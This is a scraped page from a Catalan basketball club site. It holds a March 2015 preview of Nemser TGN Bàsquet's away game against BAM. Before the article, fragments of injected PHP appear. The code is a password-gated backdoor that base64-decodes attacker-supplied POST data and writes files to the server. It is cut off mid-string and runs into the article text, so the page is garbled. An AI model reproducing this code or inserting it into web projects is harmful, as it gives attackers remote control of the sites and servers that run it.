function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Nemser TGN Bàsquet busca la cinquena victòria seguida a la pista del BAM (diumenge, 12h) - Tgn Bàsquet Club -

El Nemser TGN Bàsquet busca la cinquena victòria seguida a la pista del BAM (diumenge, 12h)

By
Updated: març 7, 2015

En el moment més dolç del curs el Nemser TGN Bàsquet pot perllongar una ratxa victoriosa que el refermi en la part mitjana alta de la classificació (actualment és vuitè, amb un balanç d’11 victòries i 9 derrotes). L’equip lila visita demà la pista d’un equip, el Bàsquet Ateneu Montserrat (BAM) que només ha guanyat 3 partits en tota la temporada (penúltim) i que es presenta, doncs, com una bona oportunitat per continuar en el bon camí, el del triomf. El conjunt que entrena Jordi Hernández ha trobat la consistència que necessitava en la primera volta i ara es presenta com un conjunt molt consistent a casa i a fora. De fet, si guanya demà el BAM, sumarà el cinquè triomf seguit, la millor ratxa del curs. “Si guanyem, serà la tercera victòria fora de casa, dues de seguides. Per fer-ho, caldrà que totes les jugadores aportin el seu gra de sorra”, explica l’entrenador lila.

Jordi Hernández no podrà comptar amb Laura Martínez, absent per motius personals, i per cobrir la seva baixa ha convocat Laura López, del sènior B.

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *